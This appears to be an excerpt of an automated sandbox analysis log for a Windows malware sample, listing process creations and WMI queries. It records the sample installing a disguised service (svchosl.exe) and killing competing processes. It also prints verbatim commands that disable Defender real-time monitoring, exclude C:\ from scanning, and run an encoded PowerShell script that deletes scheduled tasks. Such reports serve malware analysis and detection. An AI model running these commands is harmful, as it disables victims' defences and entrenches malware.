Source: C:\Windows\SysWOW64\takeown.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v3.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;nl.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v2.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v3.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v1.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;nl.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;nl.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v2.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v3.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;ape_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v3.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;full_rdp_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp.exe&quot;)
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SUPERFETCH.EXE&apos;
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v4.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;nl.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;WerFault.exe&quot;)
Source: C:\Windows\SysWOW64\icacls.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v2.exe&quot;)
Source: C:\Users\123.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: taskkill.exe, 00000068.00000002.2750786952.0000000003497000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "IntelConfigService.exe")M;.EXE;.BAtto
Source: taskkill.exe, 00000068.00000003.2750103431.0000000003497000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000068.00000003.2749810130.0000000003497000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "IntelConfigService.exe")M;.EXE;.BA
Source: taskkill.exe, 0000006B.00000002.2760463424.0000000000C71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Wmiic.exe")Co$$;8
Source: file.exe, 00000000.00000002.3280784216.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004D7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004E0E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3285742985.0000000005946000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004EB7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004E24000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\123.exe "C:\users\123.exe"
Source: C:\Users\123.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\MicrosoftSystem\run.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\MicrosoftSystem\Wmiic.exe "C:\programdata\MicrosoftSystem\wmiic.exe" install MicrosoftESS svchosl.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 1 /NOBREAK
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\MicrosoftSystem\Wmiic.exe "C:\programdata\MicrosoftSystem\wmiic" start MicrosoftESS
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 2 /NOBREAK
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MicrosoftSystem\Wmiic.exe C:\programdata\MicrosoftSystem\Wmiic.exe
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Process created: C:\ProgramData\MicrosoftSystem\svchosl.exe "svchosl.exe"
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\ProgramData\MicrosoftSystem\svchosl.exe "svchosl.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net start MicrosoftESS
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start MicrosoftESS
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\mig.exe "C:\users\mig.exe"
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIABzAHQAbwBwACAAdwBtAHMAZQByAHYAaQBjAGUACgB0AGEAcwBrAGsAaQBsAGwAIAAvAGYAIAAvAGkAbQAgAG0AaQBnAHIAYQB0AGUALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAASQBuAHQAZQBsAEMAbwBuAGYAaQBnAFMAZQByAHYAaQBjAGUALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAATQBTAFQAYQBzAGsALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAAUwB1AHAAZQByAGYAZQB0AGMAaAAuAGUAeABlAAoAdABhAHMAawBrAGkAbABsACAALwBmACAALwBpAG0AIABXAG0AaQBpAGMALgBlAHgAZQAKAHQAYQBzAGsAawBpAGwAbAAgAC8AZgAgAC8AaQBtACAAVwByAGEAcAAuAGUAeABlAAoAYwBtAGQAIAAvAGMAIAB0AGEAawBlAG8AdwBuACAALwBGACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzACIACgBzAGMAaAB0AGEAcwBrAHMAIAAvAGQAZQBsAGUAdABlACAALwB0AG4AIAAiAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAIgAgAC8ARgAKAGMAbQBkACAALwBjACAAdABhAGsAZQBvAHcAbgAgAC8ARgAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbQBpAGcAcgBhAHQAZQAuAGUAeABlACIACgBjAG0AZAAgAC8AYwAgAGQAZQBsACAALwBGACAALwBRACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABtAGkAZwByAGEAdABlAC4AZQB4AGUAIgAKAAoA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" stop wmservice
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop wmservice
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im migrate.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im IntelConfigService.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im MSTask.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Superfetch.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Wmiic.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Wrap.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c takeown /F c:\windows\tasks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\takeown.exe takeown /F c:\windows\tasks
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn WindowsUpdate /F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c takeown /F C:\ProgramData\migrate.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\takeown.exe takeown /F C:\ProgramData\migrate.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del /F /Q C:\ProgramData\migrate.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /I /N "Superfetch.exe"
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\takeown.exe takeown /f c:\windows\tasks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAK
